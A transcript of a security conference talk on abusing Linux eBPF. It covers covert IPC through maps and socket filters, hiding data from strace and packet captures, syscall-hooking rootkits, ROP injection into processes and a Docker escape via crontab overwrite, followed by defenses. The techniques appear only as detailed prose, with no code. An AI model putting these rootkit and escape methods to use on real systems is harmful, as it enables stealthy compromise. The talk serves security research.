 uh we are going to hear now from uh Jeff but first couple announcements uh no smoking or vaping in this room uh of anything of any kind at any time uh if you manage to sneak in outside beverages shame on you uh uh and um if you are uh going to consume any uh anything that you brought in then it needs to be water and that is all that is all yeah cool so Jeff here uh came in from New York he is giving kind of an update on a talk that he has given before he is unfortunately not a first time speaker but it's good that he came back and was not terrified uh uh into uh never returning so let's give Jeff a big round of applause. Hi folks uh so I'd just like to start by saying that this is sort of a 45 minute condensed snapshot of a 105 minute talk submission so uh this is going to get pretty dense. So uh I'm Jeff I work for NCC group uh doing a lot of research and other hacking stuff and uh one of the things that brought me to this topic was the fact that I've done a lot of um PCAP packet processing stuff um and also uh dynamic instrumentation and this kind of work has actually tickled both of those for me um so we're going to be covering a whole bunch of things um and uh part of a big part of this talk is set up and then uh the rest of it is kind of uh a whole bunch of very um I would say fundamental primitive techniques that can be used to build up some very nasty things um so first uh eBPF uh it is extended BPF but what what is all of this BPF nonsense so BPF is Berkeley packet filter it is this sort of uh bytecode instruction set virtual machine that runs in kernel space ideally to process packets in plane and the idea is that uh when you run TCP dump and you give it like a port filter um TCP dump doesn't want to you know process through all the packets and you don't and it's a lot of uh it's very expensive to send all of them down to user space for it to print them out or not so it sends up a little program to the kernel and then the kernel decides which packets based on that program to actually send back down to user space to TCP dump. eBPF on the other hand um this extended stuff is sort of takes the same general idea but extends a very limited instruction set to just something that basically is kind of almost one to one with x86 um and it's it's to the point that you can actually basically compile like C code down to it um it's used for a lot of things you can still do the packet processing stuff but it's also being used for kind of dynamic uh tracing along the lines of a detrace on other Unix systems uh and everything it does is basically done through this BPF sys call uh the main two things you do with it are you load programs and maps and the programs are the code and the maps are these kind of internal data structures that map that allow you to share data between the code that runs in the kernel and code that you have that runs in user space. So uh eBPF's um instruction set architecture is like super featureful um and because of that there's a whole bunch of verification stuff that's done in the kernel to make sure that doesn't crash the kernel or hang it and stuff like that um I'm not really talking about that too much in this talk I talked about in my previous talk we're just going to kind of go straight into doing stuff with BPF and simply hope that the the code works in the first place it doesn't get rejected. So um the general idea with this is you create one of these eBPF programs and then uh you create some maps you hook them together and ideally they run all of these things are file descriptors on the user land side and uh the the programs will you get attached them to various facets of the system using very specific APIs and then they kind of get called in line to process the events uh when they happen. So uh most of the interesting eBPF stuff requires capsis admin the uh sort of god root privilege of root that really makes root root um but you can still do stuff without it um specifically uh socket filters um there are other types but they require other other privileges to actually use um the main thing within this restricted runtime that you need that you do that's useful is you call these helper functions that are essentially APIs to the kernel to actually do heavy lifting that you otherwise can't do in your little restricted environment. Um and then the code is is verified um both for like loops and stuff but also to make sure that the arguments you're passing to those helper functions aren't gonna like you know crash the kernel or corrupt memory inside the kernel. Um so why eBPF um why am I doing all this stuff? So it's got a lot of interesting APIs and things to play around with. It was created for kind of high performance packet processing now it's just being applied to anything and everything in the kernel because programmatic logic is the best logic. Um and it really only has kind of two modes there's no in between right now there is work on it but it's not really done and it's kind of very just scratch the surface so basically when you're running your eBPF code it's either running like super unprivileged or it is all of the privileges and there really isn't isn't anything between um which makes it really hard to sandbox to the point that you know if you're actually using this in say a container um to use it it like you have to turn off certain things you have to turn off all the security just to use it properly and then that leaves you a very vulnerable target to to attack. Um so why evil eBPF? Uh because there are a lot of fun things we can do with these fancy new APIs that the people who made them were not really thinking of because they were uh trying to move real fast. Uh so what does this talk about? Uh shenanigans and what I mean by that is uh we're gonna be doing things along the lines of uh obfuscated communication channels between processes that are really hard for someone on the system to kind of track unless they're using very similar technologies to follow them and root kits. Lots of root kits. Uh so we're gonna talk start with a bit of tooling on what we need to do to get all of this stuff working up and running and then we're gonna kind of jump straight into the meat of it. So you know we want to build all this stuff we want to get this eBPF code running but you know we have to we have to actually have like a tool chain that does stuff so we have to you know figure out a way to compile code into this eBPF stuff um actually get it to load into the kernel. Uh we have to set up uh you know comms between the kernel and the user space code and the eBPF code uh and then potentially we're also wanna we're also worrying about um portability across systems because if we're building this thing um to target and run on a system that is not our own we can't necessarily assume that it's going to be amenable to run it uh us running our code on it. Um so we wanna keep things uh very lightweight and small. So uh as with many things in Linux there are a lot of choices to uh shoot your various digits off with. Um so uh you kind of have to pick a way that you're gonna do a bunch of eBPF stuff um and uh heads up I I went with the LLVM client approach but I think it's important to kind of go cover all of them and what what they're good at and what they're not good at. So at a high level you know you can do raw eBPF instructions um by hand using this kind of C macro domain specific language. Um it's it's often used for very simple examples it's it's hard to build up bigger stuff with it. Um you could use this uh LLVM tool chain to compile C code into these eBPF architecture elf binaries. Um there's a lot of infrastructure to build it uh built into the links kernel but it's uh it's build infrastructure is a little slow to get it done so there are also uh tool chains to do it out of tree out of Linux tree um but then you have to manage all your headers. Um and then at a high level there are things like BCC and go BPF which uh essentially uh have a bunch of instrumentation that happens to your C code and they do a bunch of stuff to kind of make a uh a variant of C that allows for easier auto um registering of things and then the rest of the code you interact with from either Python or go on the the user land side. After that you know generally at a high level just to interact with the eBPF APIs there are raw syscalls because libcs don't actually ship um wrapper stub functions to call these things um but then there's libbpf which is maintained in the kernel which basically solves that problem and provides a couple of other nifty things. And then this magic BPF load dot C which I'll get to in a bit. So uh raw BPF um is very unsanitary um yeah I wouldn't really recommend it for building anything complicated um but you're going to be able to generate BPF code that the LLVM tool chain isn't going to build and the kernel may not be expecting because it may be expecting the sorts of things that the LLVM tool chain is going to build and not stuff you cobbled together by hand. So I'll leave you with that. Um and then uh the LLVM stuff is pretty simple um assuming you've got a basic tool chain that can kind of just build the stuff for you. Um I've got a lot of code snippets I'm not necessarily going to walk through all of them they're kind of more for reference material um so don't feel like you have to read and understand every line of code that appears in this talk. Um so I have kind of avoided using the Linux kernel uh tool changes because it's really slow and I like to make small changes and rebuild quickly. So I've been using this XDP project XDP tutorial repo um from what appears to be Facebook developers who've been doing stuff with um packet processing and I'm not using this for packet processing all that much but it works. Um it's a very hackable build system um and then once you actually have your binary you need to actually load it. So an interesting thing about how this stuff works is that to reference those maps um you actually have to take the um the instructions and then inline into them map uh file descriptors and then load it. So you actually have to create the maps first um and then shunt them into the the byte code and then load that into the kernel and the libbpf and bpf load uh do a lot of magic to pull the code out of sections of the binary and pass it up to the kernel. Then there's a high level API's they're really useful for things like tracing they make a lot of stuff very easy they take care of a lot of heavy lifting but they also do a lot of magic and it can be hard to figure out what's going on at the deeper layers of these things and they also require a very extended runtime presence to have access to headers and their own libraries and do things dynamically. So you basically have to get the whole thing on top of the system to use it in the first place. Um so I I went with the LVM Clang approach um by modifying the make files of that XB tutorial repo. I've been able to make statically linked binaries that also statically link in their um the ebpf elf file into it and then I've been using um memfd syscall apis to actually load that buffer as a file path um due to how those uh libraries want to load it from a file path and not just straight from a buffer. Uh bcc goppf can't really reasonably do this kind of stuff. I just want to drop the binary on not have like an extended everything. Um but bcc is really useful to get started with a lot of this stuff um and it's useful for kernel tracing but it doesn't support all the kernel tracing apis I'll actually be talking about today. So let's talk a little bit about doing bad things with IPC and and this really means um obscuring communications leading people astray and sending data without sending it and reading data without reading it. So uh to talk a little bit about the maps um the maps basically are what you use to share data between your programs in the kernel and the user land stuff. But it turns out you actually don't need to attach them to a bpf program to use them. Um you can just make the calls from user land to store data off off process um and then the maps are actually you know they're just file descriptors and you just make a special syscall to them to interact with them. So because they're file descriptors we can just pass them between processes using things like unix domain sockets or binder if you're on android and have access to this stuff. And basically this allows us to do a very um interesting form of IPC where we'll send the file descriptors across and then uh we'll have the other process kind of right into the map and then we in the original process will read from it or vice versa. So you can basically just have a couple of index indices in your map uh spread out. Um so in this case we have uh two two slots in the map. They're each 256 bytes. They're indexed by like just a regular unsigned integer. And uh you just kind of associate them with with one particular process use writer reader um sender receiver. And you just write to them using BPF map update elem. And you read from it out using BPF map uh look up elem. And both of these are just kind of wrappers around that same BPF syscall. It's just has a bunch of different sub commands. Um word of warning though all of the things about these maps are managed by the kernel including the sizes of their values. So um if you're blindly receiving these file descriptors from untrusted processes you're very potentially easily going to run into problems. So um if we go back to this example you'll note that in the BPF map update elem call here we don't actually pass a size but we've made sure that the buffer is 256 bytes even though we've only put hello world which is a couple of bytes. The reason for this is that the kernel knows that the entry is 256 bytes. It's gonna read those 256 bytes from whatever pointer you give it. So if that buffer isn't big enough it's gonna start reading the values after it. And vice versa when you're trying to pull data out if your buffer isn't big enough to hold the max value it's just gonna clobber clobber wherever you put the buffer. Um or after it really. Um but uh there's a way to deal with this. Um BPF is very kind of reflective. You can query the kernel for all sorts of metadata about the programs including the size of these things so you can just dynamically allocate the amount of size that you need. Um so the programs are a little bit interesting because they're actually just sort of single functions and every time you have really a separate function it's actually treated as a separate program. Um and generally you call a bunch of static inline functions so they just get kind of bundled into the one program. Um and it turns out you can actually have multiple of these at the same time in the same execution context. You make a special BPF map called a program array. And you can fill it with these file descriptors from user space. And then in the kernel side you can call this BPF tail call function uh which will essentially just jump the context over and it will never return. So if there is a file descriptor for a program in the map at the indices uh indices your uh index you're trying to call it'll just jump to it and never come back. And if it isn't it'll just fall through and keep executing. Um so the interesting thing about this is that these these uh program array maps can actually be updated dynamically at run time. So uh you can just kind of keep updating it and each call will just call a new uh function whenever it whenever it sees it. Um so what this means is is that we can just pass over some maps to another process. Have them kind of dynamically fill in uh their own programs that will uh take the spots in that program array. And then every time sort of the event happens such as like a packet is received um it will call their code which can then send a message back to us. And so the idea here is you actually need to send two um map file descriptors. You need to send the program array they're going to write into. And then you actually need to send the map um to to put in that it's going to write to because it doesn't have a global context awareness of the file descriptors up in the BPF side. So each program is associated with its own maps. They uh they simply can call each other separately through the arrays. Um so in this case we have a very simple program that all it does is call this BPF tail call. And then the idea is that we send the file descriptors over to the the other process. In our own process we're actually just going to set up like something like a tcp socket server. And we're actually just going to keep sending packets to ourselves so that at regular intervals we can we can trigger the functionality to run in the kernel. And then we'll pull the data out from uh from the map afterwards. The the thing that this is that why we need the two file descriptors is that you will uh first uh in your regular code that the one uh that the writer is going to be that you're going to bite uh be dynamically updating. Um you'll be defining your own map and generally speaking the way that the the libraries work is they'll just kind of create a map for it. You actually don't want to use that map. You have to actually go through that code after the fact, iterate over it and shunt in the the actual map that you want to be writing to which you got over the Unix domain socket or binder etc. Um and then reload that program. And then you put uh you use BPF map update LM to shunt the program's file descriptor into the uh the program array. Um and so as a demo for this um basically to to start we have a couple things going on here. I'm going to briefly explain. On the right side we have the code that actually does the updating. Um and the iteration of um all the functionality. Uh so it's it's iterating through the instructions and every time there's one that would have a map file descriptor it puts in the map that the map file descriptor that's received and then at the end it does uh it loads the program and then it updates the uh the map entry. And in the middle we have the uh the actual code that's going to be dynamically updated injected in. It just prints out uh DEF CON 27. And on the left uh we have the original programs which are the main entry point and then kind of this fallback implementation that prints waiting until uh until it gets overwritten. And so in this example uh we're just gonna uh start the thing up and uh the first couple of times it's got that waiting printing out. And now it's been updated dynamically after the fact. And so this essentially allows us to uh do a bunch of very uh dynamic updates so uh so that we can just sneak data in in places that people aren't going to be looking. You could do all sorts of other stuff where you could actually have data that's being sent over the socket that then's being uh then is being uh potentially transformed in kernel and then written out as the real message to the BPF buffer so if someone's just looking at what's going on in the socket it that's not actually the data that the application is really operating on. Um so to talk a little bit more about the sockets the socket filters um they are really special. Because they are the only ones you can use freely um from unprivileged processes. So um I say this unprivileged. Docker actually blocks the BPF2 syscall unless you're running Capsis admin um for whatever reason. But in general this is an unprivileged call and doesn't require anything. Um it's also super poorly documented as it turns out. So privilege processes can create um like raw IP sockets. This is you know what Ping does to send out those those INET packets over the internet raw. Um but without privileges you know you can create normal TCP UDP sockets, UNIX domain sockets either stream sockets or datagram. When you attach a socket filter program to it uh either the the EBPF or the classic BPF um different things happen. So for the raw sockets you the the program will actually see the packets from the beginning of their ethernet frame. And for kind of the regular IP based ones like TCP UDP it will see them from the start of the transport header. So the TCP header the UDP header for UNIX sockets it actually just the start of the the array into the buffer is actually just like the data payload itself. Additionally while these uh socket filters can't modify the packets directly they can drop them uh which would just completely break TCP. Um but they can also truncate them. Um and so that can cause that can cause very interesting things and you can potentially build a very complicated uh setup that might full wire shark where you say uh drop a packet that contains like the real message and then uh with a modified uh TCP stack on a remote host you have full control over you send another magic packet that will actually be accepted and then when someone tries to in wire shark reassemble the stream uh they see something different from what your application actually processed because it was reading from the packets and not from the socket. Um so this leads to an interesting uh just attack in general like you can also read without reading because like you don't actually have to call read or any received sys call on the socket because these events get called every time the packet is received not when the user land process actually tries to read from the socket. So if you just set up a socket server and you never actually receive on it you can have someone send you data and then if someone's uh trying to look at your data not through like TCP dump but through like S trace they won't see the data because S trace actually doesn't print out the strings that are passed over the um the BPF sys call for uh reads and writes as it turns out they'll just see a random pointer and they won't know what's going on. Um so it's fairly simple to do this you just kind of register your socket filter to it and then every time that a packet comes in you just write it down to the map that gets read out every so often by the user land process which they never just it never calls read. Uh you can also do this in the reverse direction. So you can uh you can write to things and then block the data from actually going out such that it won't actually send packets but every write will then be shunted into the the memory in the kernel and then depending on if you've already chained this with like the map communication you can then leak the data back out to another map file descriptor every time you hit write and and anyone who's on that computer will like be none the wiser about it. Um you can also use these techniques using other BPF programs that can actually write to the packets so they might be able to hide data in and then take it back out so that everything looks normal at the user land level but like what actually goes over the network or what doesn't go over the network is sort of some secret data that's hard to see what's going on. Um but they they require privileges and you can do all sorts of other crazy stuff with them too. So as a demo of this um I have this uh piece of code here that runs a regular TCP socket server and it never calls receive read receive from receive message all of these kind of standard sys calls for reading data from a socket and on the right side I just echo into like telnet to the to the service. So I'm running S trace on this to prove that like no none of these sys calls are actually being issued and so if someone were looking for these they just would not see anything happen. So we've now like we get the data from this the 41, 42, 43 that's all just hex for you know capital A, B, C, D etc. And uh the signal stuff that goes on at the top is just because that's how I'm uh doing the I'm checking I'm pulling at the uh the E.B.P.F. buffer I have a signal handler that pulls at it like once a second. So I have not actually if you look at this I have not issued any of these standard reading sys calls in the socket and yet I have somehow obtained the data that was sent to it. Um you can do all sorts of stuff to build up on this to hide data from people who depending on how they're trying to look at what you're doing. So let's talk a little bit about the um the kernel tracing. So E.B.P.F. uh basically supports a whole bunch of modes to do dynamic instrumentation of kernel functionality so that you can kind of see the data that's flowing through. Um this is very privileged um and can be used to you know compromise systems as it turns out. But uh you know these things can read arbitrary kernel memory and user space memory. And this presents us an interesting opportunity for covert IPC on a system we've really kind of posed. So we can actually just read data out of processes that they were never actually going to send to the kernel. They never attempted to send it there it was just sitting in memory and they're not issuing any sys calls. Also what we can do is they can issue bad sys calls that are going to get rejected and the data is not actually going to make it through the kernel. So like if they do send on a bad file descriptor it's not going to result in a packet and so TCP dobs not going to see it. But we can. So I uh I like to do this mind reading trick uh with the code uh where uh because close is kind of a magic sys call it it takes a file descriptor and that's it. File descriptors have to be non-negative they're non-negative integers. So anytime it receives a negative integer it just rejects it and doesn't do anything and it's kind of idempotent. So uh what you can do here is you can hook closed and you can just wait for like certain magic negative file descriptors to start a stateful handshake with a particular um process and uh after that just start un-martialing data out of these negative file descriptors to communicate with with yourself basically. And you know if someone's looking at this probably they don't really look at closed. If they see it they might think something's wrong but are they really going to like attempt to figure out what's going on here? Maybe maybe not. So that's a neat trick but like this stuff can also just absolutely corrupt memory. Um so there is this special BPF probe write user helper function uh which I talked about my previous talk and this is sort of the thing that gives us root kit capability. So when you use this it raises an event that like goes out on de-message but it's so useful. Um you can also when you're doing these things you can actually abort sys calls at entry. Uh sys call is a couple of other um special functions in the kernel that have this special macro that kind of denotes that they can be um aborted. But basically this BPF override return allows you to just bail out of actually executing the sys call so the kernel just doesn't do it. And you can also give an arbitrary return value. So um you know we need to write things that are useful. Um and most of the interesting uh data that are in sys calls are pointers to user land memory. Um so we can actually potentially overwrite strings and other structs that are being uh sent to the kernel or written back by the kernel. Um and uh we can also just prevent sys calls from reaching the kernel. So there are a couple of uh high level uh variants of this attack. Um this kind of way of building a root kit. Um you can redirect sys calls. You can modify them. You can make opens for a like a shell file, a shell script. Open a path that is something you control somewhere else. So it just opens and reads your code. You could also every time they read you could just send bad data back to it um and just lie. So you can uh after the kernel has written the code you can you can stomp over it with your own data. You can also just fake the return by aborting the call and write the data yourself. And you can also just completely black hole the data so they just can't communicate with the outside world. Um so in the first one where we're going to be modifying the data that's being sent to the kernel. Um generally speaking the way this works is you set kind of a tracing hook. A K probe is on the sys call entry. A K rep probe gets called uh on the sys call return after the kernel's like processed it. And generally speaking uh you know when you're when you're hooking these sys calls all the calls across the entire system regardless of container make it they're all sharing the one kernel. They're all using the same sys calls. All of them go through that. And so you potentially are having a lot of throughput going through there. And so if you're going to be messing around with this you actually want to be very careful you're not going to crash stuff. So you want to you want to kind of filter through and determine if the particular process that's calling in and its particular inputs are stuff you actually want to mess with otherwise you might just crash the system accidentally. Um when you do this uh you could just you could just override it and then be done with it. But if you want to be sneakier you actually want to persist the stack data or or keep data wherever it was from the uh the user land process that's being sent up. Um so that on the return after the sys call is finished uh like a processing but before context returns back to user space you can actually try and write back their data to it so if they checked it after the fact it would look clean like nothing happened. And the way that you want to do this um is you want to use the process ID uh thread group ID and then maybe a file descriptor as well if you're keeping track of it because uh all of this is essentially stateless other than the data that you maintain in your BPF maps. So you kind of can't maintain context without using those maps. And the only anchor point you have for context is this kind of very basic information about the process and kernel thread it's using. Um but that's good enough actually as it turns out. Um and the the opposite approach where you're just modifying the data you do basically exactly the same stuff um word for word but uh you you do your filtering to determine whether or not you're going to do stuff at the entry point because the entry point is the one that actually receives the arguments. And at the end um you can either have persisted the arguments and then decide at the end if you want to do something or not. Or you could have just decided at the beginning. But it's at the end after the sys call has been processed that you need to write the data because otherwise if you overwrite their stuff the kernel is just going to overwrite you again. Um and then nothing's going to happen. Um but other other than that it's basically the same exact approach. Blackholing everything is fun uh because you you can just block the sys calls but you can do so much more than that because you can just pretend to be the kernel essentially and write in arbitrary data as if they had succeeded. And so they think they're communicating out they think they've alerted like the IDS or whatever it is that something bad is going on. They think they're writing out to like their their log stash or whatever. It hasn't happened. It's not happening. They think it's happened. It isn't. Um so we that's that's really useful depending on if you're trying to like reverse something and you don't want to let it kind of communicate out. Whereas like if you're attempting to use set comp to deny stuff you know it's going to know that it got rejected and it's going to be able to act accordingly. Um so there's one other limitation to this probe write user call. Um you can't write non-writeable pages. So you know we can't just clobber the text section with shell code unfortunately. Um at least for like properly compiled programs. If they've got bad bad protections on their sections then or they jit stuff a lot um things change. Uh but we can't assume that for all processes. Um so this limits us to kind of what's in the stack heap other sections that are writeable. Um things like function pointers uh save file descriptors. Maybe they have they generate scripts like dynamically or shell commands that we could write into. Um things like that. But we can't we can't guarantee that these things are there. The only thing we can really kind of at a high level guarantee exists is that they have return addresses. Um mostly. So I put together kind of a very uh concrete way of of writing Rop payloads into user land processes from EBPF um kernel tracing stuff. And this is kind of the stuff you want to do uh you can do for real real root kits to get in like PID 1 which is what I did in my previous talk. But uh to really cover the whole thing there's a lot of things to do. So you can either start with kind of one of two ways of looking at it. You can say that you want to have one payload that you want to indiscriminately inject into all processes. And if you want to do that you need to you need to kind of have it be working on something like a shared library that are all going to load. Like their libc. So glibc is a great target for this because it's got all sorts of wacky functionality built into it. Um like a DL open implementation which allows you to dynamically load a shared library from a file path. Um and the moment a shared library is loaded that actually gives it arbitrary code execution right then and there. So all you have to do is scan for some gadgets put it together. Um but a big bout of boom you you have code execution if you can get your Rop chain to actually like load into a process. Um very reliable. Um they have every gadget you could ever want to make this across every version of the binary I've looked at across multiple different distros. Um then you know you want to do your Rop payload. But maybe maybe you're not going to be generating like this. Maybe you're dealing with a static linked binary. Maybe you're dealing with one that does code gen. And where you're getting called from isn't necessarily stuff that you can really know what's going on easily. So um I'll talk a little bit about dynamic uh generation of of Rop gadgets and things. So when we do this EVPF stuff we need to you know pick some sys calls that ideally our target process will be calling. And we're going to register up some K probes, K rep probes on it. Um just so that we can get stuff. We can get a user land context to be able to get the ability to one have pointers to uh to their user land. And also actually be in the right kind of processing context to write the data to them. Um so then within the code much like before we kind of need to sift through and uh see that the particular calls are actually coming from processes we want. Um the only system you could very easily, the only process you could very easily detect is PID 1 because it's PID 1 across the entire system regardless of containers and namespacing and things like that. The real PID 1 is always PID 1 for real. Um so it's a very easy target. Um but other than that you know if you want to know that someone's doing something it's a specific process. So if you're going to change the world view of a process and not target others you kind of need to watch what it's doing and build up some state about it to know that it's actually the one that you want to hook. Um then there are two step threes here on purpose. The first one is when you're running this kind of pre-generated rot payload and the second one is when you're going to try and dynamically generate it on the fly. So in the former there's in your K probes uh when they get called they actually receive all of the user land uh registers that were uh that were the state of the registers when the sys call was made to trap up to the kernel. And so we can just like pull out the instruction pointer um and and we know that that is probably that's going to be made in the libc somewhere so we know exactly the offset from the start just by what the address of the sys call instruction was and like then we know exactly where we are. Um if in the other side depending on kind of how ridiculous the binary you're dealing with is um you could do the same thing but the the instructions at where it's executing may not all like be that useful. They may be you know in the heap somewhere where there's not actually a whole bunch of code it's just a bunch of jitted code. Um and so you probably want to uh scan through the stack and so you can do this uh you just kind of look at valid stack offsets from where the um the stack pointer was uh stack pointer register. And then you essentially want to look back and see if the thing that like the former instruction that would have been um the one before uh so when you like in x86 when you make a call instruction um it's going to increment the uh the address and then put that in the stack so what you return into is the next instruction. We need the previous instruction that actually issued the call. And so we can then try and detect what that instruction was and if it was a call and it actually looks like it went to where we are then everything's good but it may have actually been a PLT entry and those are actually uh those are like the entries to dynamically linked functions like your libc. And so those um are the call will actually go to a jump and the jump will go to where where the the code that your you were it was formally executing before it made the sys call was. And so you need to just parse those instructions a little bit to dump out kind of the offsets and things and then then you know where you are. Um after that in both cases um you can just uh go backwards as far as you can until you get page faults essentially that are free for you and don't crash anything and then you know where the memory region started and then you can just scan the data straight forward and dump it all out until you again reach a page that's not read writeable etcetera. After that you potentially are going to uh generate your uh your payload based off of this so you've you've dumped out all of the raw memory of the process you know exactly where it sits um you can just attempt to find gadgets and build them into some generic payload that does whatever you want it to do. Um you just need to make sure there's a clean up routine. Um after that uh we go back in with another hook and we need to do the stack skimming stuff again because we need to uh find out uh where we were so that when we we write in the raw payload this time it's actually at the right place so that when the sys call returns then the kind of sys call stub will then attempt to return back in user space and it'll jump right into a raw payload. Um before we do this though uh we need to back up the memory from user space because we're just going to clobber all of it and we need to return cleanly so that the thing doesn't crash after our code runs. Um and so what we do is we we not only need to get the general stack space we're writing to we also need to kind of back up all the space we're potentially going to clobber as part of a raw chain itself. Um then after that we write it in we return the raw chain starts executing and it's it's done it's whatever its magic task is that's up to you. Um and then it starts it's coordinated clean up routine and what this needs to do what I like to do with this is I like to do one of those um hooks on clothes to signal that I it should uh the kernel side should write back most of the stack. Not all of it because we have a couple of Rop gadgets we still need. So the last Rop uh as we do this we're actually going to write some new Rop gadgets past the end of the stack um and those are going to help with our clean up routine. The remaining Rop gadgets that are still there that we haven't overwritten with the backed up data uh those will then execute once we return back to user space and they'll exist simply to shift the stack pointer to where the new Rop gadgets we we put are which weren't actually in what what's considered the stack until we shifted the stack pointer. The new Rop gadgets will then exist to kind of overwrite uh restore the backed up data to the the last Rop gadget that we didn't overwrite and then it will uh set a return value for all the way back the thing we actually hooked on um and then it will uh uh shift the stack pointer back to where it needs to be and then the code will return back into whatever it actually called the original syscall wrapper in the first place and everything's clean in it it never know it didn't know what happened. Um but there's a limitation on these these K probe K rep probe TracePoint APIs. Um they all use the SysFS um it's a special mounted file system that does a lot of magic stuff on Linux a lot of things are under it. Um but Docker by default has an app armor profile that blocks access to this and Docker also doesn't by default mount it as a fully writable um mount which you otherwise need to do this this K probe tracing stuff. However eBPF actually is another type of tracing program that doesn't interact with the SysFS at all and there hasn't actually been all that much tooling built on it yet. Um even BCC um the the main like instrumentation uh framework doesn't actually support these raw trace points. These are magic uh and uh it's got a very complicated process for setting it up. Step one, you call this beat the BPFS call with the raw TracePoint open sub command and you literally just give it the name of the registered TracePoint event you want to attach to. That's it. That's it. All it is. Um you also you know have a BPF program that you've loaded and then you know put it in there as well but like that that we've already done that before. Um so M&M once once said uh and Moby you can get stomped by Obi. Uh Moby is the sort of upstream open source code base that Docker is built from and so we're gonna break out of that um in a way that otherwise hasn't been displayed publicly um because everyone who's been showing uh Docker breakouts using BPF stuff that isn't otherwise exploiting like a kernel vulnerability has basically turned off app armor to do it. Um which like we don't need to we'll just leave it on. I don't care. Um so this is a slight modification of the previous ones we've been talking about um which is necessary because of the way the raw TracePoints work. You can't actually trace arbitrary CIS call events with them like you can with K probe. Um they'll probably add it in the future. They just only did it for regular TracePoints not the raw TracePoints. What we can hook on are these sort of primordial CIS call events. CIS enter and CIS exit. Uh which essentially get all of the same data anyway. It just means that we need to re implement the hooks. So instead of having like a separate BPF program for each like function return. We just have one for like the entry to all CIS calls and one for the end uh the return of all CIS calls. And we just use like a switch on top of the uh the CIS call ID and just handle it differently. So we can write essentially all the same code um and it all just works. And even though we can't necessarily have a very fancy DSL that gives us all the arguments as actual like function parameters. They're all just in the registers anyway so we get the register state. You know RDI, RSI, RDX, etc. and your standard AMD64 calling convention. Like those are the first couple of of arguments passed any CIS call. So um this is very easy. The one thing that you need to make sure to do is again you need to save that state because in the return we have like absolutely zero context other than that we know the particular um process ID thread group ID again. So in this particular case we're just going to serialize like all the registers state and the CIS call ID. We're just going to shove it in there. We're going to index into this uh like uh it's a it's a hash map data type so we can we don't have to be like regular indexes from zero. We can just use the um process ID thread group ID in there and uh and everything's good. And then in the return the first thing we do is we just see if we even have a state associated with us. Because if we don't then we didn't even attempt to do anything on the entry. We don't care about the return. We just bail out and let the let the CIS call happen. But if it's something that we want to be dealing with then we're actually going to start processing again with another switch on top of the CIS call ID. And then we're potentially going to process the data. Um so my example here I'm doing uh basically the same sort of uh clock uh using the uh the CIS call hooking stuff. Uh I'm not I'm not just writing into memory um like to do a rob chain. I'm just over writing um say file IO uh without things realizing it. So in this particular case um I've started up a docker container. The only thing I've added to it is the CIS admin capability. Um that's it. I haven't turned off app armor. I've got a binary in there. I'm about to run it. It's just got some some payload there. I'm going to cat this file that otherwise doesn't exist. And mind you I'm catting it on the outside. Um then what this payload does is it actually uh overrides crontab whenever any file tries to read it. And so basically we're going to now load our code and now when we try to load crontab now we have our own thing our own code in the top level crontab of the host outside of the docker container. So now we're just going to wait a little bit for a cron on the system to pick it up and start executing our code. And then now um we've we've completely successfully broken out of the docker container using nothing but Capsis admin. We haven't turned off any of the actual security mechanisms. Um we just gave a regular privilege that people do whenever they're going to do like fancy BPF stuff. Um we've just broken out. We're done. Like we've escaped. So what can what can we do to defend against this stuff? Um you could remove or blacklist this BPF2 syscall entirely. Docker sort of tries to do this when it's unprivileged but the moment you add Capsis admin it dynamically updates its syscall filter that uses seccomp BPF to actually allow it back in because you need to do stuff. Um unfortunately it's not going to work because modern linux systems are increasingly relying on BPF stuff. Like system derelies on it so if you're in it you know you don't want your in it to crash right at the beginning of boot because you've decided to you know mess around with your kernel that would be bad. Um so and then you know you need to really be prepared for what someone can do when they when they have access. So you can actually just log all of these BPF programs. Um using that same API that we pulled out um the sizes of the maps uh if you're privileged you can actually just dump out the content of the maps. You can dump out all of the code of the programs uh uh when they're loaded. Um BPF tool uh is a utility to do this. It's it's very simple. Unfortunately because they all use the BPF to syscall um they are susceptible so someone's got one of those K probes in there. They can start overwriting the response data and lie to it and they can hide what's actually going on. So once it's in there it's kind of it's still game over. Um but we can actually ourself use tracing um to see things that maybe are bad. So we can look for when like their eBPF maps that are being transferred being uh processes. We can look for uh you know eBPF maps that aren't actually associated with eBPF programs. We can look for just when eBPF programs are being sent between processes. I didn't talk about this too much because it's it's kind of it's a one to one. So every time you want to send a new message you have to kind of send a new file descriptor over. I'd rather have like a one setup um in the example with the call where we just send a couple maps over and then no one sends any magic file descriptors to each other. They just magically appear and start executing. It's much sneakier. But you could you could do the other the other way around. And then you can also just look for when they're unexpected eBPF programs being attached to things that they shouldn't be and when they're unexpected you know eBPF tracing programs that are being added that's probably a sign that something bad is going on. Um but it's honestly it's unclear how much more common these operations will get. So they may not be as kind of um anomalies in the near future as they are now. Um so the more APIs that we have the more problems that we have uh because there's more kind of chicanery people can do with them. Um and even the unprivileged APIs uh can enable really like screw behaviors to evade people who are trying to see what what's happening on a system. And once you get the privilege eBF it's like impossible to stop. Um and honestly a good number of these APIs really shouldn't even require these privileges in the first place. There is work being done that to kind of change this. But like they shouldn't you shouldn't have to require Capsis Admin to do a lot of things that really don't require it. Because a lot of them are essentially analogous to raw packet IO. Um so they like they shouldn't require that. And if you do that makes those programs a softer target because they then need to be less and less sandboxed to be able to work properly because of all the stuff that gets layered on here. Um I'm personally waiting for a special eBPF map type that allows us to just generically pass file descriptors across processes. But I doubt that one's gonna happen. Um I'd like to thank Andy and JKF uh for the help uh with a lot of this research. And Wise Man uh once said you can't hide secrets from the future using math. I think a simpler version of this that also holds true is you simply can't hide from the future. Uh I don't have time for questions uh but I'd be happy to talk about all the stuff and other research from doing an NCC group um somewhere else uh feel free to find me. I'm also on Twitter um happy to talk. Um thank you.